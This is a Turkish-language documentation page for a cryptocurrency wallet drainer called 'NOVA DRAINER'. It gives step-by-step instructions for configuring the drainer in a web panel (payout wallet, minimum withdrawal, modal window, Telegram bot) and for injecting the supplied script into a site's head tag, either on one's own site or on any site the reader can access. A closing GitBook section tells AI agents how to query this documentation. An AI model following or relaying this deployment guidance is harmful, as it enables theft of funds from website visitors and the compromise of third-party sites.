> For the complete documentation index, see [llms.txt](https://read.cryptograb.wiki/cryptograb-automatic-affiliate/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://read.cryptograb.wiki/cryptograb-automatic-affiliate/nova-drainer-docs-tr/readme/compiler-kendi-sitenize-kurulum.md).

# Compiler - Kendi sitenize kurulum

## Ayarlar ve özelliklerin genel görünümü

{% @supademo/embed demoId="cm3g12v0b3l358hspdntrdbqb" url="<https://app.supademo.com/demo/cm3g12v0b3l358hspdntrdbqb>" %}

Nasıl kurulacağını inceleyeceğiz <mark style="color:mor;">NOVA DRAINER</mark> kendi barındırma hizmetinize ve sitenize, ayrıca erişiminiz olan herhangi bir başka siteye.

### Adım 1: Yetkilendirme

1. Siteye gidin [crypto-grab.io](https://crypto-grab.io).
2. Telegram Bot ile yetkilendirme kullanarak web yönetim panelinize giriş yapın.

### Adım 2: Derleyici ayarları

1. Web yönetim panelinde bölümünü seçin <mark style="color:mavi;">**Compiler**</mark>.
2. Cüzdan adresinizi belirtin.
3. Çekim için minimum tutarı belirleyin.
4. Diğer ayarlar varsayılan olarak bırakılabilir.

Daha ayrıntılı açıklama ve fonksiyonların açıklaması bölümünde [<mark style="color:turuncu;">Merkezi yönetim paneli</mark>](https://read.cryptograb.org/nova-drainer-docs/readme/centralizovannaya-admin-panel)

{% embed url="<https://read.cryptograb.org/nova-drainer-docs/readme/centralizovannaya-admin-panel>" %}

### Adım 3: Modal pencere ayarları (gerekliyse)

1. Bölüme gidin **Modal Window**.
2. Pencerenin görüntülenmesini gereksinimlerinize göre ayarlayın.

### Adım 4: Kişisel bot ayarları (gerekliyse)

1. Botunuzun bilgilerini ilgili bölümde belirtin.

### Adım 5: Talimatlar ve dosyaların alınması

1. Tüm ayarları yaptıktan sonra size kod ve dosya verilecektir.
2. Verilen kodu şu kapanış etiketinden önce yapıştırın `</head>` sitenizdeki dosyada `index.html| index.php`
3. Dosyayı indirin ve web sitenizin kök dizinine yerleştirin.

**Web sitesini yapılandırmak için settings.js dosyasını yükleyin, tasarımınızın kök klasörüne koyun ve bu kod satırlarını etiketinin sonuna yerleştirin**&#x20;

Bu adımları izleyerek gerekli işlevselliği sitenize entegre edebilirsiniz.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://read.cryptograb.wiki/cryptograb-automatic-affiliate/nova-drainer-docs-tr/readme/compiler-kendi-sitenize-kurulum.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
